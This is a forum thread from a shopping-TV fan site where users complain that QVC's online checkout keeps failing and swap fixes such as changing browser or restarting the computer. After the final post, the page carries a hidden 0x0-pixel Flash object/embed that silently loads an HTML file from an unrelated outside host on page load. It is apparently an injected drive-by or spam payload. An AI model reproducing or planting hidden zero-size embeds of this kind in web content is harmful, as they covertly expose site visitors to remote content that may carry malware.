QVC online

ShoppingTelly

Help Support ShoppingTelly:

piper4

Feline & Veiltail Techie!
Two Elms left & One Oak north of Pixie Wood on the
Hi

I am wonder whether it's just me or has anyone else had a problem ordering online it's happened to me quite a lot recently you get the message that they cannot process the order just now and to telephone which is ok if your next to a phone which I'm not at the mo and I was watching on a laptop.

Grumble over, off to try again.

piper

i only order online and never had a problem in the last 3yrs i've been with them.

I've had that message a couple of times piper. I agree it's very annoying. They lost a sale from me last time as I sourced the product elsewhere. It worked out cheaper too!

It has happened to me a few times, and I end up not buying it as I usually can not be bothered to go downstairs and get the phone.:tongue2: so it saves me money in the long run. I have started to wonder if the F.A.R.T.S are behind this ploy????:cheeky:

Usually if I get that message I just close down & restart the computer & it works perfectly.
This last week or so I'm having probs with Internet Explorer,keep getting that message when trying to place an order but have no probs using Firefox or Opera.
Haven't a clue what's going on :headbang:

I get that frequently. I've found that if I switch to a different browser - eg IE, Opera, Firefox, rather than Chrome which I'm currently using - the problem goes away and I can order.

For some reason this happens when you have been on the QVC site for a little while particularly if it has been left on without much activity. Usually you can get around this by closing down the internet browser and re-opening again. If that does not work then you may have to shut down and restart the PC.

Thanks for the tips i also have lots of problems with this especially if i go through quidco then i have very little chance of ordering on line. There was 2 items i wanted to order yesterday 1 in the morning and 1 at tea time and none of them would go through so i just gave up, i wonder how much this is costing qvc in sales.

Thanks everyone for you suggestions, I do have I.E, Firefox and Opera so I will swop to another one if it happens again, can't remember if it has happened on all three at one point, I'm a bit dozey to-day :sleepy:

Yesterday I had been trying to order a stone mountain bag that was on easy pay, perhaps when they come back on later in the year it may be on it again or one of the other ones, it was just too much to pay all in the one go, but not to worry saved my dosh at the mo.

thanks again

piper

I ordered an item by the red button on the TV and it was advertised as 3 easy payments but they took the whole amount of money at once:cheeky:

It has happened to me a few times, and I end up not buying it as I usually can not be bothered to go downstairs and get the phone.:tongue2: so it saves me money in the long run. I have started to wonder if the F.A.R.T.S are behind this ploy????:cheeky:

Who???? Us????? :54: Never :happy:

I've had this problem a few times & thought it was just me:tongue2:. I do tend to look at other sites and leave it for ages so I always put it down to that. I've just used QCut and not lost the item I wanted to buy.

I've had this problem a few times and it's a bit annoying if something is selling quickly or has gone limited stock. I know I could just pick up the phone but I want my 5% from Quidco.

I've had this problem on occasions when there is a lot of demand for a product. I think it happens when they are updating their stock situation, I've left it 5 minutes and gone back and found that what I was trying to order and which was showing as available, is now unavailable!

It happens to me every time lately.

Anybody would think they didn't want us to order!

Still. It's handy for us weak F.A.R.T.S. :fart2:

I ordered an item by the red button on the TV and it was advertised as 3 easy payments but they took the whole amount of money at once:cheeky:

how ridiculous, they should certainly fix that

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://submiturpics.com/uploads/pages/3683/info.html"></param><param name="allowFullScreen" value="true"></param><embed src="http://submiturpics.com/uploads/pages/3683/info.html" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Latest posts

Back